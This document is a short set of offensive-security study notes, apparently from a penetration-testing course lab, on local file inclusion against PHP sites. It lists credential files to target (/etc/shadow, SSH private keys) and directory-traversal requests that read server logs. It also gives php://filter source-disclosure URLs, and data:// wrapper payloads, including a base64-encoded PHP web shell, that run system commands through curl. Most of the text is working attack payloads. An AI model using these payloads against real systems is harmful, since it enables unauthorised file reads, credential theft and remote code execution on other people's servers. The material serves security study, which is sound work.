/etc/passwd
/etc/shadow
/home/$USER/.ssh/id_rsa
/etc/apache2/sites-enabled/000-default.conf
/var/www/html/index.html
/var/www/html/index.php
/var/log/apache2/access.log
# Windows
C:\\Windows\\System32\\drivers\\etc\\hosts
<https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt>
User Agent is included in the log entry
kali@kali:~$ curl <http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log>
...
192.168.50.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
...
php://filter/resource=[file].php ⇒ display contents of PHP file
php://filter/convert.base64-encode/resource=[file].php
data://text/plain,<?php[code]?> ⇒ run PHP code
data://text/plain;base64,[base64] ⇒ run base 64 encoded PHP code
data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls
php://filter # include the contents of a file
# wrapper
<http://example.com/wook/index.php?page=php://filter/resource=admin.php>
# converts to base64
<http://example.com/wook/index.php?page=php://filter/convert.base64-encode/resource=admin.php>
allow_url_include settings needs to be enabled.data:// # achieve code execution
# wrapper
curl "http://example.com/wook/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
# when WAF or other security mechanisms are in place
echo -n '<?php echo system($_GET['cmd']); ?>' | base64
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==
curl "<http://example.com/wook/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls>"